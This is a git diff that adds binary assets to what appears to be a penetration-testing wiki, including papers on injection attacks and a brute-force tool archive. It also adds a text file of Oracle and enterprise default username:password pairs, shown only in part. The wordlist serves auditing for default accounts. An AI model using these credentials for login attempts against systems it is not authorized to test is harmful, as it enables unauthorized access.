diff --git a/.gitbook/assets/1 (1).jpg b/.gitbook/assets/1 (1).jpg
new file mode 100644
index 00000000..c5d0a4c9
Binary files /dev/null and b/.gitbook/assets/1 (1).jpg differ
diff --git a/.gitbook/assets/1 (1).png b/.gitbook/assets/1 (1).png
new file mode 100644
index 00000000..d22b32a6
Binary files /dev/null and b/.gitbook/assets/1 (1).png differ
diff --git a/.gitbook/assets/1.jpg b/.gitbook/assets/1.jpg
new file mode 100644
index 00000000..c5d0a4c9
Binary files /dev/null and b/.gitbook/assets/1.jpg differ
diff --git a/.gitbook/assets/1.png b/.gitbook/assets/1.png
new file mode 100644
index 00000000..94cf4687
Binary files /dev/null and b/.gitbook/assets/1.png differ
diff --git a/.gitbook/assets/10.png b/.gitbook/assets/10.png
new file mode 100644
index 00000000..95076470
Binary files /dev/null and b/.gitbook/assets/10.png differ
diff --git a/.gitbook/assets/11.png b/.gitbook/assets/11.png
new file mode 100644
index 00000000..baafe6a7
Binary files /dev/null and b/.gitbook/assets/11.png differ
diff --git a/.gitbook/assets/12.png b/.gitbook/assets/12.png
new file mode 100644
index 00000000..d468d25c
Binary files /dev/null and b/.gitbook/assets/12.png differ
diff --git a/.gitbook/assets/13.png b/.gitbook/assets/13.png
new file mode 100644
index 00000000..c49d3d1a
Binary files /dev/null and b/.gitbook/assets/13.png differ
diff --git a/.gitbook/assets/14.png b/.gitbook/assets/14.png
new file mode 100644
index 00000000..309f5950
Binary files /dev/null and b/.gitbook/assets/14.png differ
diff --git a/.gitbook/assets/15.png b/.gitbook/assets/15.png
new file mode 100644
index 00000000..bc0d2d9a
Binary files /dev/null and b/.gitbook/assets/15.png differ
diff --git a/.gitbook/assets/16.png b/.gitbook/assets/16.png
new file mode 100644
index 00000000..e185872b
Binary files /dev/null and b/.gitbook/assets/16.png differ
diff --git a/.gitbook/assets/17.png b/.gitbook/assets/17.png
new file mode 100644
index 00000000..76cb2b90
Binary files /dev/null and b/.gitbook/assets/17.png differ
diff --git a/.gitbook/assets/18.png b/.gitbook/assets/18.png
new file mode 100644
index 00000000..7565cb1d
Binary files /dev/null and b/.gitbook/assets/18.png differ
diff --git a/.gitbook/assets/19.png b/.gitbook/assets/19.png
new file mode 100644
index 00000000..90ca1321
Binary files /dev/null and b/.gitbook/assets/19.png differ
diff --git a/.gitbook/assets/1_jauyizf8zjdggb7ocszc-g.png b/.gitbook/assets/1_jauyizf8zjdggb7ocszc-g.png
new file mode 100644
index 00000000..aea4b23c
Binary files /dev/null and b/.gitbook/assets/1_jauyizf8zjdggb7ocszc-g.png differ
diff --git a/.gitbook/assets/2.jpg b/.gitbook/assets/2.jpg
new file mode 100644
index 00000000..34a2dd2a
Binary files /dev/null and b/.gitbook/assets/2.jpg differ
diff --git a/.gitbook/assets/2.png b/.gitbook/assets/2.png
new file mode 100644
index 00000000..47c50560
Binary files /dev/null and b/.gitbook/assets/2.png differ
diff --git a/.gitbook/assets/20.png b/.gitbook/assets/20.png
new file mode 100644
index 00000000..d5493e6f
Binary files /dev/null and b/.gitbook/assets/20.png differ
diff --git a/.gitbook/assets/21.png b/.gitbook/assets/21.png
new file mode 100644
index 00000000..2ac54b42
Binary files /dev/null and b/.gitbook/assets/21.png differ
diff --git a/.gitbook/assets/22.png b/.gitbook/assets/22.png
new file mode 100644
index 00000000..51c5443a
Binary files /dev/null and b/.gitbook/assets/22.png differ
diff --git a/.gitbook/assets/23.png b/.gitbook/assets/23.png
new file mode 100644
index 00000000..e03728e7
Binary files /dev/null and b/.gitbook/assets/23.png differ
diff --git a/.gitbook/assets/24.png b/.gitbook/assets/24.png
new file mode 100644
index 00000000..6ba0f4b4
Binary files /dev/null and b/.gitbook/assets/24.png differ
diff --git a/.gitbook/assets/25.png b/.gitbook/assets/25.png
new file mode 100644
index 00000000..61779265
Binary files /dev/null and b/.gitbook/assets/25.png differ
diff --git a/.gitbook/assets/26.png b/.gitbook/assets/26.png
new file mode 100644
index 00000000..287b5051
Binary files /dev/null and b/.gitbook/assets/26.png differ
diff --git a/.gitbook/assets/3-1.png b/.gitbook/assets/3-1.png
new file mode 100644
index 00000000..0b526479
Binary files /dev/null and b/.gitbook/assets/3-1.png differ
diff --git a/.gitbook/assets/3.jpg b/.gitbook/assets/3.jpg
new file mode 100644
index 00000000..de5e2cd1
Binary files /dev/null and b/.gitbook/assets/3.jpg differ
diff --git a/.gitbook/assets/3.png b/.gitbook/assets/3.png
new file mode 100644
index 00000000..a7505429
Binary files /dev/null and b/.gitbook/assets/3.png differ
diff --git a/.gitbook/assets/4 (1).png b/.gitbook/assets/4 (1).png
new file mode 100644
index 00000000..1cb2ee14
Binary files /dev/null and b/.gitbook/assets/4 (1).png differ
diff --git a/.gitbook/assets/4.jpg b/.gitbook/assets/4.jpg
new file mode 100644
index 00000000..26a0f626
Binary files /dev/null and b/.gitbook/assets/4.jpg differ
diff --git a/.gitbook/assets/4.png b/.gitbook/assets/4.png
new file mode 100644
index 00000000..472fbed8
Binary files /dev/null and b/.gitbook/assets/4.png differ
diff --git a/.gitbook/assets/41d0cdc8d99a8a3de2758ccbdf637a21.jpeg b/.gitbook/assets/41d0cdc8d99a8a3de2758ccbdf637a21.jpeg
new file mode 100644
index 00000000..7d84b3ba
Binary files /dev/null and b/.gitbook/assets/41d0cdc8d99a8a3de2758ccbdf637a21.jpeg differ
diff --git a/.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png b/.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png
new file mode 100644
index 00000000..7c73ffdc
Binary files /dev/null and b/.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png differ
diff --git a/.gitbook/assets/5.jpg b/.gitbook/assets/5.jpg
new file mode 100644
index 00000000..66d7e1ca
Binary files /dev/null and b/.gitbook/assets/5.jpg differ
diff --git a/.gitbook/assets/5.png b/.gitbook/assets/5.png
new file mode 100644
index 00000000..9de6a60c
Binary files /dev/null and b/.gitbook/assets/5.png differ
diff --git a/.gitbook/assets/6.gif b/.gitbook/assets/6.gif
new file mode 100644
index 00000000..1fc7f7d0
Binary files /dev/null and b/.gitbook/assets/6.gif differ
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (1).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (1).png
new file mode 100644
index 00000000..4c4968b4
Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (1).png differ
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (2).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (2).png
new file mode 100644
index 00000000..4c4968b4
Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (2).png differ
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (3).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (3).png
new file mode 100644
index 00000000..4c4968b4
Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (3).png differ
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (4).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (4).png
new file mode 100644
index 00000000..4c4968b4
Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (4).png differ
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (5).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (5).png
new file mode 100644
index 00000000..4c4968b4
Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (5).png differ
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6).png
new file mode 100644
index 00000000..4c4968b4
Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6).png differ
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67.png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67.png
new file mode 100644
index 00000000..4c4968b4
Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67.png differ
diff --git a/.gitbook/assets/7.png b/.gitbook/assets/7.png
new file mode 100644
index 00000000..cac7cd8c
Binary files /dev/null and b/.gitbook/assets/7.png differ
diff --git a/.gitbook/assets/8.png b/.gitbook/assets/8.png
new file mode 100644
index 00000000..f6071d1f
Binary files /dev/null and b/.gitbook/assets/8.png differ
diff --git a/.gitbook/assets/9.png b/.gitbook/assets/9.png
new file mode 100644
index 00000000..4ca74e4b
Binary files /dev/null and b/.gitbook/assets/9.png differ
diff --git a/.gitbook/assets/a1.png b/.gitbook/assets/a1.png
new file mode 100644
index 00000000..94cf4687
Binary files /dev/null and b/.gitbook/assets/a1.png differ
diff --git a/.gitbook/assets/a10.png b/.gitbook/assets/a10.png
new file mode 100644
index 00000000..2b7b4dd9
Binary files /dev/null and b/.gitbook/assets/a10.png differ
diff --git a/.gitbook/assets/a11.png b/.gitbook/assets/a11.png
new file mode 100644
index 00000000..85b1a8e0
Binary files /dev/null and b/.gitbook/assets/a11.png differ
diff --git a/.gitbook/assets/a12.png b/.gitbook/assets/a12.png
new file mode 100644
index 00000000..0249d9f6
Binary files /dev/null and b/.gitbook/assets/a12.png differ
diff --git a/.gitbook/assets/a13.png b/.gitbook/assets/a13.png
new file mode 100644
index 00000000..d5d699d9
Binary files /dev/null and b/.gitbook/assets/a13.png differ
diff --git a/.gitbook/assets/a14.png b/.gitbook/assets/a14.png
new file mode 100644
index 00000000..8daa0e12
Binary files /dev/null and b/.gitbook/assets/a14.png differ
diff --git a/.gitbook/assets/a15.png b/.gitbook/assets/a15.png
new file mode 100644
index 00000000..ed808f55
Binary files /dev/null and b/.gitbook/assets/a15.png differ
diff --git a/.gitbook/assets/a16.png b/.gitbook/assets/a16.png
new file mode 100644
index 00000000..b3c7203c
Binary files /dev/null and b/.gitbook/assets/a16.png differ
diff --git a/.gitbook/assets/a17.png b/.gitbook/assets/a17.png
new file mode 100644
index 00000000..6a9ecae0
Binary files /dev/null and b/.gitbook/assets/a17.png differ
diff --git a/.gitbook/assets/a19.png b/.gitbook/assets/a19.png
new file mode 100644
index 00000000..c89c7ffb
Binary files /dev/null and b/.gitbook/assets/a19.png differ
diff --git a/.gitbook/assets/a2.png b/.gitbook/assets/a2.png
new file mode 100644
index 00000000..c8d339e2
Binary files /dev/null and b/.gitbook/assets/a2.png differ
diff --git a/.gitbook/assets/a20.png b/.gitbook/assets/a20.png
new file mode 100644
index 00000000..a8cb42c7
Binary files /dev/null and b/.gitbook/assets/a20.png differ
diff --git a/.gitbook/assets/a21.png b/.gitbook/assets/a21.png
new file mode 100644
index 00000000..34d60bb1
Binary files /dev/null and b/.gitbook/assets/a21.png differ
diff --git a/.gitbook/assets/a22.png b/.gitbook/assets/a22.png
new file mode 100644
index 00000000..47681388
Binary files /dev/null and b/.gitbook/assets/a22.png differ
diff --git a/.gitbook/assets/a3.png b/.gitbook/assets/a3.png
new file mode 100644
index 00000000..8a1ffcfe
Binary files /dev/null and b/.gitbook/assets/a3.png differ
diff --git a/.gitbook/assets/a4.png b/.gitbook/assets/a4.png
new file mode 100644
index 00000000..bde4ec6c
Binary files /dev/null and b/.gitbook/assets/a4.png differ
diff --git a/.gitbook/assets/a5.png b/.gitbook/assets/a5.png
new file mode 100644
index 00000000..69e26fe3
Binary files /dev/null and b/.gitbook/assets/a5.png differ
diff --git a/.gitbook/assets/a6.png b/.gitbook/assets/a6.png
new file mode 100644
index 00000000..a2837c36
Binary files /dev/null and b/.gitbook/assets/a6.png differ
diff --git a/.gitbook/assets/a7.png b/.gitbook/assets/a7.png
new file mode 100644
index 00000000..a97e3e55
Binary files /dev/null and b/.gitbook/assets/a7.png differ
diff --git a/.gitbook/assets/a8.png b/.gitbook/assets/a8.png
new file mode 100644
index 00000000..301dfaee
Binary files /dev/null and b/.gitbook/assets/a8.png differ
diff --git a/.gitbook/assets/a9.png b/.gitbook/assets/a9.png
new file mode 100644
index 00000000..01280438
Binary files /dev/null and b/.gitbook/assets/a9.png differ
diff --git a/.gitbook/assets/app-release.zip b/.gitbook/assets/app-release.zip
new file mode 100644
index 00000000..ce7c3ec2
Binary files /dev/null and b/.gitbook/assets/app-release.zip differ
diff --git a/.gitbook/assets/asd1.png b/.gitbook/assets/asd1.png
new file mode 100644
index 00000000..c06c5907
Binary files /dev/null and b/.gitbook/assets/asd1.png differ
diff --git a/.gitbook/assets/b1.png b/.gitbook/assets/b1.png
new file mode 100644
index 00000000..ffd6fde7
Binary files /dev/null and b/.gitbook/assets/b1.png differ
diff --git a/.gitbook/assets/b2.png b/.gitbook/assets/b2.png
new file mode 100644
index 00000000..e6a65f81
Binary files /dev/null and b/.gitbook/assets/b2.png differ
diff --git a/.gitbook/assets/b3.png b/.gitbook/assets/b3.png
new file mode 100644
index 00000000..b03da63d
Binary files /dev/null and b/.gitbook/assets/b3.png differ
diff --git a/.gitbook/assets/b4.png b/.gitbook/assets/b4.png
new file mode 100644
index 00000000..dd685597
Binary files /dev/null and b/.gitbook/assets/b4.png differ
diff --git a/.gitbook/assets/copy_binary_admin.png b/.gitbook/assets/copy_binary_admin.png
new file mode 100644
index 00000000..055b246a
Binary files /dev/null and b/.gitbook/assets/copy_binary_admin.png differ
diff --git a/.gitbook/assets/ctx_wsuspect_white_paper (1).pdf b/.gitbook/assets/ctx_wsuspect_white_paper (1).pdf
new file mode 100644
index 00000000..d152ec3a
Binary files /dev/null and b/.gitbook/assets/ctx_wsuspect_white_paper (1).pdf differ
diff --git a/.gitbook/assets/ctx_wsuspect_white_paper.pdf b/.gitbook/assets/ctx_wsuspect_white_paper.pdf
new file mode 100644
index 00000000..d152ec3a
Binary files /dev/null and b/.gitbook/assets/ctx_wsuspect_white_paper.pdf differ
diff --git a/.gitbook/assets/eaubb2ex0aerank.jpg b/.gitbook/assets/eaubb2ex0aerank.jpg
new file mode 100644
index 00000000..dabf9038
Binary files /dev/null and b/.gitbook/assets/eaubb2ex0aerank.jpg differ
diff --git a/.gitbook/assets/eki5edauuaaipik.jpg b/.gitbook/assets/eki5edauuaaipik.jpg
new file mode 100644
index 00000000..24c786eb
Binary files /dev/null and b/.gitbook/assets/eki5edauuaaipik.jpg differ
diff --git a/.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf b/.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf
new file mode 100644
index 00000000..a58ea246
Binary files /dev/null and b/.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf differ
diff --git a/.gitbook/assets/en-local-file-inclusion-1.pdf b/.gitbook/assets/en-local-file-inclusion-1.pdf
new file mode 100644
index 00000000..588a75f7
Binary files /dev/null and b/.gitbook/assets/en-local-file-inclusion-1.pdf differ
diff --git a/.gitbook/assets/en-nosql-no-injection-ron-shulman-peleg-bronshtein-1.pdf b/.gitbook/assets/en-nosql-no-injection-ron-shulman-peleg-bronshtein-1.pdf
new file mode 100644
index 00000000..3b49b5d5
Binary files /dev/null and b/.gitbook/assets/en-nosql-no-injection-ron-shulman-peleg-bronshtein-1.pdf differ
diff --git a/.gitbook/assets/en-php-loose-comparison-type-juggling-owasp (1).pdf b/.gitbook/assets/en-php-loose-comparison-type-juggling-owasp (1).pdf
new file mode 100644
index 00000000..f69e6346
Binary files /dev/null and b/.gitbook/assets/en-php-loose-comparison-type-juggling-owasp (1).pdf differ
diff --git a/.gitbook/assets/en-php-loose-comparison-type-juggling-owasp.pdf b/.gitbook/assets/en-php-loose-comparison-type-juggling-owasp.pdf
new file mode 100644
index 00000000..f69e6346
Binary files /dev/null and b/.gitbook/assets/en-php-loose-comparison-type-juggling-owasp.pdf differ
diff --git a/.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf b/.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf
new file mode 100644
index 00000000..9eacd655
Binary files /dev/null and b/.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf differ
diff --git a/.gitbook/assets/epmd_bf-0.1.tar.bz2 b/.gitbook/assets/epmd_bf-0.1.tar.bz2
new file mode 100644
index 00000000..2fa3f8d7
Binary files /dev/null and b/.gitbook/assets/epmd_bf-0.1.tar.bz2 differ
diff --git a/.gitbook/assets/final-oracle-accs.txt b/.gitbook/assets/final-oracle-accs.txt
new file mode 100644
index 00000000..7e1932c4
--- /dev/null
+++ b/.gitbook/assets/final-oracle-accs.txt
@@ -0,0 +1,1578 @@
+AASH:AASH
+ABA1:ABA1
+abm:abm
+ABM:ABM
+adams:wood
+ADAMS:WOOD
+adldemo:adldemo
+ADLDEMO:ADLDEMO
+administrator:admin
+ADMINISTRATOR:ADMIN
+administrator:administrator
+ADMINISTRATOR:ADMINISTRATOR
+admin:jetspeed
+ADMIN:JETSPEED
+admin:welcome
+ADMIN:WELCOME
+AD_MONITOR:LIZARD
+ADS:ADS
+ADSEUL_US:WELCOME
+ahl:ahl
+AHL:AHL
+ahm:ahm
+AHM:AHM
+ak:ak
+AK:AK
+ALA1:ALA1
+AL:AL
+alhro:xxx
+ALHRO:XXX
+alhrw:xxx
+ALHRW:XXX
+ALLUSERS:ALLUSERS
+alr:alr
+ALR:ALR
+AMA1:AMA1
+AMA2:AMA2
+AMA3:AMA3
+AMA4:AMA4
+AMF:AMF
+AMS1:AMS1
+AMS2:AMS2
+AMS3:AMS3
+AMS4:AMS4
+ams:ams
+AMS:AMS
+AMSYS:AMSYS
+amv:amv
+AMV:AMV
+AMW:AMW
+andy:swordfish
+ANDY:SWORDFISH
+ANNE:ANNE
+anonymous:anonymous
+ANONYMOUS:ANONYMOUS
+AOLDEMO:AOLDEMO
+APA1:APA1
+APA2:APA2
+APA3:APA3
+APA4:APA4
+ap:ap
+AP:AP
+APPLEAD:APPLEAD
+applmgr:applmgr
+APPLMGR:APPLMGR
+applsys:applsys
+APPLSYS:APPLSYS
+applsys:apps
+APPLSYS:APPS
+applsys:fnd
+APPLSYS:FND
+applsyspub:applsyspub
+APPLSYSPUB:APPLSYSPUB
+applsyspub:fndpub
+APPLSYSPUB:FNDPUB
+applsyspub:pub
+APPLSYSPUB:PUB
+applysyspub:fndpub
+APPLYSYSPUB:FNDPUB
+applysyspub:pub
+APPLYSYSPUB:PUB
+apps:apps
+APPS:APPS
+apps_mrc:apps
+APPS_MRC:APPS
+appuser:apppassword
+APPUSER:APPPASSWORD
+APS1:APS1
+APS2:APS2
+APS3:APS3
+APS4:APS4
+aq:aq
+AQ:AQ
+aqdemo:aqdemo
+AQDEMO:AQDEMO
+aqjava:aqjava
+AQJAVA:AQJAVA
+aquser:aquser
+AQUSER:AQUSER
+ARA1:ARA1
+ARA2:ARA2
+ARA3:ARA3
+ARA4:ARA4
+ar:ar
+AR:AR
+ARS1:ARS1
+ARS2:ARS2
+ARS3:ARS3
+ARS4:ARS4
+ART:ART
+asf:asf
+ASF:ASF
+asg:asg
+ASG:ASG
+asl:asl
+ASL:ASL
+ASN:ASN
+aso:aso
+ASO:ASO
+asp:asp
+ASP:ASP
+ast:ast
+AST:AST
+atm:sampleatm
+ATM:SAMPLEATM
+AUC_GUEST:AUC_GUEST
+audiouser:audiouser
+AUDIOUSER:AUDIOUSER
+aurora$jis$utility$:invalid
+AURORA$JIS$UTILITY$:INVALID
+aurora$orb$unauthenticated:invalid
+AURORA$ORB$UNAUTHENTICATED:INVALID
+AUTHORIA:AUTHORIA
+ax:ax
+AX:AX
+az:az
+AZ:AZ
+B2B:B2B
+BAM:BAM
+bc4j:bc4j
+BC4J:BC4J
+BCA1:BCA1
+BCA2:BCA2
+ben:ben
+BEN:BEN
+bic:bic
+BIC:BIC
+bil:bil
+BIL:BIL
+bim:bim
+BIM:BIM
+bis:bis
+BIS:BIS
+biv:biv
+BIV:BIV
+bix:bix
+BIX:BIX
+blake:paper
+BLAKE:PAPER
+blewis:blewis
+BLEWIS:BLEWIS
+BMEADOWS:BMEADOWS
+BNE:BNE
+bom:bom
+BOM:BOM
+BP01:BP01
+BP02:BP02
+BP03:BP03
+BP04:BP04
+BP05:BP05
+BP06:BP06
+brio_admin:brio_admin
+BRIO_ADMIN:BRIO_ADMIN
+brugernavn:adgangskode
+BRUGERNAVN:ADGANGSKODE
+brukernavn:password
+BRUKERNAVN:PASSWORD
+bsc:bsc
+BSC:BSC
+bug_reports:bug_reports
+BUG_REPORTS:BUG_REPORTS
+BUYACCT:BUYACCT
+BUYAPPR1:BUYAPPR1
+BUYAPPR2:BUYAPPR2
+BUYAPPR3:BUYAPPR3
+BUYER:BUYER
+BUYMTCH:BUYMTCH
+calvin:hobbes
+CALVIN:HOBBES
+CAMRON:CAMRON
+CANDICE:CANDICE
+CARL:CARL
+CARLY:CARLY
+CARMEN:CARMEN
+CARRIECONYERS:CARRIECONYERS
+CATADMIN:CATADMIN
+catalog:catalog
+CATALOG:CATALOG
+cct:cct
+CCT:CCT
+cdemo82:cdemo82
+CDEMO82:CDEMO82
+cdemo82:cdemo83
+CDEMO82:CDEMO83
+cdemo82:unknown
+CDEMO82:UNKNOWN
+cdemocor:cdemocor
+CDEMOCOR:CDEMOCOR
+cdemorid:cdemorid
+CDEMORID:CDEMORID
+cdemoucb:cdemoucb
+CDEMOUCB:CDEMOUCB
+cdouglas:cdouglas
+CDOUGLAS:CDOUGLAS
+CEASAR:CEASAR
+ce:ce
+CE:CE
+centra:centra
+CENTRA:CENTRA
+central:central
+CENTRAL:CENTRAL
+CFD:CFD
+CHANDRA:CHANDRA
+CHARLEY:CHARLEY
+CHRISBAKER:CHRISBAKER
+CHRISTIE:CHRISTIE
+cids:cids
+CIDS:CIDS
+CINDY:CINDY
+cis:cis
+CIS:CIS
+cisinfo:cisinfo
+CISINFO:CISINFO
+cisinfo:zwerg
+CISINFO:ZWERG
+cis:zwerg
+CIS:ZWERG
+CLARK:CLARK
+clark:cloth
+CLARK:CLOTH
+CLAUDE:CLAUDE
+CLINT:CLINT
+CLN:CLN
+CNCADMIN:CNCADMIN
+cn:cn
+CN:CN
+company:company
+COMPANY:COMPANY
+compiere:compiere
+COMPIERE:COMPIERE
+CONNIE:CONNIE
+CONNOR:CONNOR
+CORY:CORY
+cqschemauser:password
+CQSCHEMAUSER:PASSWORD
+cquserdbuser:password
+CQUSERDBUSER:PASSWORD
+CRM1:CRM1
+CRM2:CRM2
+CRPB733:CRPB733
+crp:crp
+CRP:CRP
+CRPCTL:CRPCTL
+CRPDTA:CRPDTA
+CSADMIN:CSADMIN
+CSAPPR1:CSAPPR1
+csc:csc
+CSC:CSC
+cs:cs
+CS:CS
+csd:csd
+CSD:CSD
+CSDUMMY:CSDUMMY
+cse:cse
+CSE:CSE
+csf:csf
+CSF:CSF
+csi:csi
+CSI:CSI
+csl:csl
+CSL:CSL
+CSM:CSM
+csmig:csmig
+CSMIG:CSMIG
+csp:csp
+CSP:CSP
+csr:csr
+CSR:CSR
+css:css
+CSS:CSS
+ctxdemo:ctxdemo
+CTXDEMO:CTXDEMO
+ctxsys:change_on_install
+CTXSYS:CHANGE_ON_INSTALL
+ctxsys:ctxsys
+CTXSYS:CTXSYS
+ctxsys:unknown
+CTXSYS:UNKNOWN
+CTXTEST:CTXTEST
+cua:cua
+CUA:CUA
+cue:cue
+CUE:CUE
+cuf:cuf
+CUF:CUF
+cug:cug
+CUG:CUG
+cui:cui
+CUI:CUI
+cun:cun
+CUN:CUN
+cup:cup
+CUP:CUP
+cus:cus
+CUS:CUS
+cz:cz
+CZ:CZ
+data_schema:laskjdf098ksdaf09
+DATA_SCHEMA:LASKJDF098KSDAF09
+DAVIDMORGAN:DAVIDMORGAN
+dbi:mumblefratz
+DBI:MUMBLEFRATZ
+dbsnmp:dbsnmp
+DBSNMP:DBSNMP
+dbvision:dbvision
+DBVISION:DBVISION
+DCM:DCM
+DD7333:DD7333
+DD7334:DD7334
+DD810:DD810
+DD811:DD811
+DD812:DD812
+DD9:DD9
+DDB733:DDB733
+DDD:DDD
+ddic:199220706
+DDIC:199220706
+demo8:demo8
+DEMO8:DEMO8
+demo9:demo9
+DEMO9:DEMO9
+demo:demo
+DEMO:DEMO
+des2k:des2k
+DES2K:DES2K
+des:des
+DES:DES
+dev2000_demos:dev2000_demos
+DEV2000_DEMOS:DEV2000_DEMOS
+DEVB733:DEVB733
+DEVUSER:DEVUSER
+DGRAY:WELCOME
+diane:passwo1
+DIANE:PASSWO1
+dip:dip
+DIP:DIP
+DISCOVERER5:DISCOVERER5
+discoverer_admin:discoverer_admin
+DISCOVERER_ADMIN:DISCOVERER_ADMIN
+DKING:DKING
+DLD:DLD
+DMADMIN:MANAGER
+DMATS:DMATS
+DMS:DMS
+dmsys:dmsys
+DMSYS:DMSYS
+DOM:DOM
+dpf:dpfpass
+DPF:DPFPASS
+DPOND:DPOND
+dsgateway:dsgateway
+DSGATEWAY:DSGATEWAY
+dssys:dssys
+DSSYS:DSSYS
+dtsp:dtsp
+DTSP:DTSP
+DV7333:DV7333
+DV7334:DV7334
+DV810:DV810
+DV811:DV811
+DV812:DV812
+DV9:DV9
+DVP1:DVP1
+eaa:eaa
+EAA:EAA
+eam:eam
+EAM:EAM
+earlywatch:support
+EARLYWATCH:SUPPORT
+east:east
+EAST:EAST
+ec:ec
+EC:EC
+ecx:ecx
+ECX:ECX
+EDR:EDR
+EDWEUL_US:EDWEUL_US
+EDWREP:EDWREP
+EGC1:EGC1
+EGD1:EGD1
+EGM1:EGM1
+EGO:EGO
+EGR1:EGR1
+ejb:ejb
+EJB:EJB
+ejsadmin:ejsadmin
+EJSADMIN:EJSADMIN
+ejsadmin:ejsadmin_password
+EJSADMIN:EJSADMIN_PASSWORD
+emp:emp
+EMP:EMP
+END1:END1
+eng:eng
+ENG:ENG
+eni:eni
+ENI:ENI
+ENM1:ENM1
+ENS1:ENS1
+ENTMGR_CUST:ENTMGR_CUST
+ENTMGR_PRO:ENTMGR_PRO
+ENTMGR_TRAIN:ENTMGR_TRAIN
+EOPP_PORTALADM:EOPP_PORTALADM
+EOPP_PORTALMGR:EOPP_PORTALMGR
+EOPP_USER:EOPP_USER
+estoreuser:estore
+ESTOREUSER:ESTORE
+EUL_US:EUL_US
+event:event
+EVENT:EVENT
+evm:evm
+EVM:EVM
+EXA1:EXA1
+EXA2:EXA2
+EXA3:EXA3
+EXA4:EXA4
+example:example
+EXAMPLE:EXAMPLE
+exfsys:exfsys
+EXFSYS:EXFSYS
+EXS1:EXS1
+EXS2:EXS2
+EXS3:EXS3
+EXS4:EXS4
+extdemo2:extdemo2
+EXTDEMO2:EXTDEMO2
+extdemo:extdemo
+EXTDEMO:EXTDEMO
+fa:fa
+FA:FA
+fem:fem
+FEM:FEM
+FIA1:FIA1
+fii:fii
+FII:FII
+finance:finance
+FINANCE:FINANCE
+finprod:finprod
+FINPROD:FINPROD
+flm:flm
+FLM:FLM
+fnd:fnd
+FND:FND
+FNI1:FNI1
+FNI2:FNI2
+foo:bar
+FOO:BAR
+FPA:FPA
+fpt:fpt
+FPT:FPT
+frm:frm
+FRM:FRM
+frosty:snowman
+FROSTY:SNOWMAN
+FTA1:FTA1
+fte:fte
+FTE:FTE
+FUN:FUN
+fv:fv
+FV:FV
+FVP1:FVP1
+GALLEN:GALLEN
+GCA1:GCA1
+GCA2:GCA2
+GCA3:GCA3
+GCA9:GCA9
+GCMGR1:GCMGR1
+GCMGR2:GCMGR2
+GCMGR3:GCMGR3
+GCS1:GCS1
+GCS2:GCS2
